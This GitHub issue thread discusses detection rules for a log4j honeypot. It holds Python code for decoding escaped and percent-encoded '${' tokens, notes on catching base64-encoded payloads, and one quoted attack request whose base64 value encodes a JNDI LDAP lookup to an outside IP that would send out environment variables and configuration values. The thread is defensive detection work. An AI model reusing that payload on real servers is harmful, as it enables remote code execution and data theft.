Detection String and False Positives #1

Open
antman1p opened this issue Dec 15, 2021 · 5 comments

@antman1p

This log4j honeypot is a great idea! However, I have a suggestion.
Detecting only on the string ${ may produce many false positives. On the other hand, some of the common YARA strings being published are proving vulnerable to WAF bypasses and produce many false negatives. Karan Lyons has published log4shell regexes that appear to mitigate this: https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

@4Nzic-fiddler
Contributor

Thank you very much @antman1p ! I thought about that and decided that since this is an INTERNAL honeypot and any scanning of its ports would be unusual to begin with, I wanted to cast as broad a net as possible to detect anything that could possibly be a payload. Personally I have been frustrated with constantly tuning my regex to account for every new obfuscation that I've seen in jndi payloads, so I figured ${ would be the minimum viable matching pattern and I wouldn't mind a few false positives if anything that looked like that scanned my internal network.

@karanlyons

Hey @4Nzic-fiddler!

Totally understand that view. But if you’re looking to get every new obfuscation you probably still want to handle escaped characters / percent encoding, and possibly handle it recursively: that may get you closer to your goal. Consider, then, using ESC_DOLLAR + ESC_LCURLY and a modified form of test_thorough that just checks for a match on that, i.e. (untested):

import re
from urllib.parse import unquote


FLAGS = re.IGNORECASE | re.DOTALL
# "$" and "{" written literally or as a \u, \x, octal, or percent escape
ESC_DOLLAR = r'(?:\$|\\u0024|\\x24|\\0?44|%24)'
ESC_LCURLY = r'(?:\{|\\u007B|\\x7B|\\173|%7B)'
# Cheap pre-checks: is there anything in the string worth decoding?
_BACKSLASH_ESCAPE_RE = re.compile(r'\\(?:u[0-9a-fA-F]{4}|x[0-9a-fA-F]{2}|[0-7]{1,3})')
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-fA-F]{2}')


START_TOKEN_INCL_ESCS_RE = re.compile(
	ESC_DOLLAR + ESC_LCURLY,
	flags=FLAGS,
)


def simple_test_thorough(string):
	last_string = None
	
	while (
		last_string != string
		and (
			last_string is None
			or len(last_string) > len(string)
		)
	):
		if START_TOKEN_INCL_ESCS_RE.search(string):
			return True
		
		last_string = string
		
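		if _BACKSLASH_ESCAPE_RE.search(string):
			try:
				# latin-1 + backslashreplace keeps non-ASCII text intact through unicode_escape
				string = string.encode('latin-1', 'backslashreplace').decode('unicode_escape')
			except UnicodeDecodeError:
				pass  # a malformed escape elsewhere in the string; leave it undecoded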
		
		if _PERCENT_ESCAPE_RE.search(string):
			string = unquote(string)
	
	return False
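
A variant of the same idea, as a rough sketch only: instead of running the whole string through the unicode_escape codec, it rewrites just the escapes it recognizes with re.sub, so malformed input cannot raise. The names has_start_token, BACKSLASH_ESCAPE_RE, and max_rounds are made up for this illustration and are not part of the gist.

```python
import re
from urllib.parse import unquote

START_TOKEN_RE = re.compile(r'\$\{')
# \uXXXX, \xXX, or one to three octal digits after a backslash
BACKSLASH_ESCAPE_RE = re.compile(
    r'\\(?:u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2})|([0-7]{1,3}))'
)


def _decode_backslash(match):
    """Turn one recognized backslash escape into the character it encodes."""
    hex4, hex2, octal = match.groups()
    if octal is not None:
        return chr(int(octal, 8))
    return chr(int(hex4 or hex2, 16))


def has_start_token(string, max_rounds=10):
    """Check for "${", peeling off one layer of escaping per round."""
    for _ in range(max_rounds):
        if START_TOKEN_RE.search(string):
            return True
        # Decode backslash escapes first, then percent escapes.
        decoded = unquote(BACKSLASH_ESCAPE_RE.sub(_decode_backslash, string))
        if decoded == string:
            return False  # nothing left to decode
        string = decoded
    # Round limit reached (assumed cap); check whatever we ended up with.
    return bool(START_TOKEN_RE.search(string))
```

For example, has_start_token('%2524%257Bjndi') needs two rounds of percent decoding before the ${ shows up, while a string with no escapes returns after the first round.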

@4Nzic-fiddler
Contributor

Good points! I'll see if I can carve out some time (currently putting out log4j fires) and test that code. I also want to incorporate looking for base64 encoded ${ as shown by these examples from GreyNoise: https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305

This one in particular is tricky:
GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOmxkYXA6Ly80NS43Ny4xMjQuNjE6NDQzLyMzZDJmMjc3MjczNzQ3ODVmZGVlMjkyYjI0Nzg2MjFkZF86O18ke2VudjpQQVRIfV86O18ke2VudjpVU0VSfV86O18ke2VudjpVU0VSTkFNRX1fOjtfJHtlbnY6SE9TVE5BTUV9Xzo7XyR7ZW52OlVTRVJETlNET01BSU59Xzo7XyR7ZW52OkNPTVBVVEVSTkFNRX1fOjtfJHtidW5kbGU6YXBwbGljYXRpb246c3ByaW5nLmRhdGFzb3VyY2UudXJsfV86O18ke3N5czpqYXZhLnZlcnNpb259fQ== HTTP/1.1

@4Nzic-fiddler
Contributor

Base64 of ${j is JHtq
Base64 of ${${ starts with JHske
I'm not sure if that's too aggressive to search for just those
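
One way to avoid hard-coding prefixes like JHtq is to decode anything that looks like base64 and then look for ${ in the result. The following is only a sketch under assumptions: the 8-character minimum run length and the names B64_TOKEN_RE and contains_b64_start_token are invented for illustration, and a payload glued directly onto other base64-alphabet characters would be misaligned and missed.

```python
import base64
import binascii
import re

# Runs of base64 alphabet characters (standard and URL-safe), optional padding.
# The minimum length of 8 is an arbitrary choice for this sketch.
B64_TOKEN_RE = re.compile(r'[A-Za-z0-9+/_-]{8,}={0,2}')


def contains_b64_start_token(text):
    """Return True if a base64-looking run in text decodes to bytes containing "${"."""
    for token in B64_TOKEN_RE.findall(text):
        # Normalize URL-safe characters and recompute the padding ourselves.
        token = token.rstrip('=').replace('-', '+').replace('_', '/')
        if len(token) % 4 == 1:
            token = token[:-1]  # no valid base64 has this length; drop one char
        padded = token + '=' * (-len(token) % 4)
        try:
            decoded = base64.b64decode(padded)
        except (binascii.Error, ValueError):
            continue
        if b'${' in decoded:
            return True
    return False


# The fixed prefix mentioned above can be reproduced directly:
assert base64.b64encode(b'${j').decode() == 'JHtq'
```

Because the whole run is decoded, this also catches ${ appearing later in the encoded value, not just at the start. The cost is the occasional chance match when unrelated base64 data happens to decode to those two bytes.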

4Nzic-fiddler self-assigned this Dec 16, 2021
4Nzic-fiddler added the enhancement label Dec 16, 2021

@karanlyons

Base64 isn't actually in a release yet, just in master, so you don't necessarily have to worry about it. People were confused (myself included) because I think some of us were accidentally reading master instead of the tagged releases, and also because one of the log4j2 user guides (which is version-stamped 2.x) states that base64 is available.
